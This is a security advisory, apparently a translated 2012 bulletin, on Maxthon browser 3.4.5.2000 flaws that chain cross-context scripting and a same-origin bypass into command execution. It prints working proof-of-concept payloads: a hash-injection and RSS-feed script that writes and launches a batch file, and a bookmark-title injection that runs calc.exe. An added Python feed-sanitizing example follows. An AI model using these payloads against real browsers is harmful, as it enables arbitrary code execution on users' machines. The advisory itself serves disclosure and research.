Published: 2012-12-03
Updated: 2012-12-10
Affected systems:
Maxthon Maxthon <= 3.4.5.2000
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56845
Maxthon is a multi-functional, customizable, tabbed browser built on the IE engine.
Maxthon v3.4.5.2000 (on Windows XP and Windows 7) contains cross-context scripting, improper file type handling and same-origin policy (SOP) bypass vulnerabilities. Chained together, these vulnerabilities can be used to achieve arbitrary command execution in four different ways.
1) A malicious user can inject arbitrary JavaScript/HTML code from an untrusted web page into the Maxthon browser's privileged zone mx://res/*. Injection points include the about:history area, the Feed Reader (about:reader) and the RSS Viewer through vulnerable RSS feed elements (<title>, <link>, <description>), the bookmark toolbar and the bookmark sidebar.
2) The browser itself can launch external tools (Calculator, Desktop, etc.). This design is insecure and allows JS to invoke executables directly.
3) Calling window.open() on the about: URI scheme bypasses the same-origin policy. Such URIs typically map to the privileged zone mx://res/*.
<*Source: Roberto Suggi Liverani
Link:
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following programs (methods) may be offensive in nature and are provided for security research and teaching purposes only. Users act at their own risk!
Injection via the location.hash property:
#"><img src=https://www.linuxidc.com/Linux/2012-12/a onerror='var b= new maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")'>
Passing multiple arguments to the executable:
#"><img src=https://www.linuxidc.com/Linux/2012-12/a onerror='var b= new maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")'>
Maliciouspage.html source code
<body><script>a = window.location.href='about:history';</script></body>
Malicious RSS feed – arbitrary code execution
<?xml version='1.0' encoding="ISO-8859-1"?>
<rss version='2.0'>
<channel>
<description>Malerisch.net</description>
<link></link>
<title>Malerisch.net</title>
<item>
<title>test'><img src=https://www.linuxidc.com/Linux/2012-12/a onerror='var b= new maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")';></title>
<link>javascript:alert(window.location);</link>
<description>07/09/2008 - test <img src=https://www.linuxidc.com/Linux/2012-12/a onerror='var b= new maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")';></description>
<pubDate>Sun, 07 Sep 2008 12:00:00 GMT</pubDate>
</item>
</channel>
</rss>
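The feed reader side of point 1 above, written here as a defender's check (added example, not code from the advisory or from Maxthon): parse the feed with a strict XML parser, HTML-escape every feed-controlled string before it reaches a page, and allow only http/https link schemes. The sample feed, the PAYLOAD marker and the example.com link are constructed for the example.

```python
import html
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed feed modelled on the advisory's malicious RSS; the payload is
# shortened to PAYLOAD and wrapped in CDATA so the XML stays well-formed.
SAMPLE_FEED = """<rss version='2.0'><channel><title>Malerisch.net</title><item>
<title><![CDATA[test'><img src=a onerror='PAYLOAD'>]]></title>
<link>javascript:alert(window.location);</link>
<description><![CDATA[07/09/2008 - test <img src=a onerror='PAYLOAD'>]]></description>
</item>
<item><title>Benign post</title><link>https://example.com/post</link>
<description>plain text</description></item>
</channel></rss>"""

SAFE_LINK_SCHEMES = {"http", "https"}  # no javascript:, about:, mx:, file:

def accepts_feed(xml_text):
    """True only for well-formed XML; a tag-soup parser would let raw <img> through."""
    try:
        ET.fromstring(xml_text)
        return True
    except ET.ParseError:
        return False

def safe_link(url):
    """Return the link only if its scheme is allowlisted, otherwise None."""
    if not url:
        return None
    url = url.strip()
    return url if urlparse(url).scheme.lower() in SAFE_LINK_SCHEMES else None

def render_item(item):
    """Render one <item> with every feed-controlled string HTML-escaped."""
    title = html.escape(item.findtext("title", default=""), quote=True)
    desc = html.escape(item.findtext("description", default=""), quote=True)
    link = safe_link(item.findtext("link"))
    head = f'<a href="{html.escape(link, quote=True)}">{title}</a>' if link else title
    return f"<div class='item'>{head}<p>{desc}</p></div>"

def render_feed(xml_text):
    """Parse strictly, render every item, and report the links that were dropped."""
    root = ET.fromstring(xml_text)
    rendered, dropped = [], []
    for item in root.iter("item"):
        raw = (item.findtext("link") or "").strip()
        if raw and safe_link(raw) is None:
            dropped.append(raw)
        rendered.append(render_item(item))
    return "".join(rendered), dropped
```

The advisory's original feed, with an unquoted <img src=...> inside <title>, is not well-formed XML and is rejected by accepts_feed() before rendering even starts.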
Malicious Add to Favorite injection – HTML source code
<html>
<head>
<title>Google</title>
<script>
evilpayload='location.href="file:///C:/windows/system32/calc.exe";'
padding="Google - "
padding2=" "
padding3=" - the best search engine - bookmark now!!!"
window.external.addFavorite("www.google.com",padding+"'><scri"+"pt>"+evilpayload+"</"+"script>"+" "+" "+padding+padding3)
</script>
</head>
<body>
<h3>Maxthon 3.3.3.1000 - Cross Context Scripting via Bookmark (title parameter) - Code Execution PoC</h3>
<font size="+1">Roberto Suggi Liverani - <a href="http://blog.malerisch.net"></a> - <a href="https://twitter.com/malerisch">@malerisch</a> - <a href="https://www.securityassessment.com">Security-Assessment.com</a></font>
<br>Steps:
<ul>
<li>User is prompted to bookmark an innocuous looking bookmark, like the one shown in
the middle of the screen. The injected payload can only be seen if the user scrolls on the
left of the title element.
<li>User adds the bookmark.
<li>User then clicks on the Star (Favorites) icon or
<li>User clicks on the bookmark link from the bookmark toolbar.
<li>In both cases, calc.exe is executed.
</ul>
The code for the exploit:<br>
<code>
evilpayload='location.href="file:///C:/windows/system32/calc.exe";'
window.external.addFavorite("www.google.com","yourpaddinghere'><scri"+"pt>"+evilpayload+"</"+"script>andpaddinghere");
</code>
</body>
</html>
Recommendations:
--------------------------------------------------------------------------------
Vendor patch:
Maxthon
-------
The vendor has not yet released a patch or upgrade. We recommend that users of this software monitor the vendor's home page for the latest version: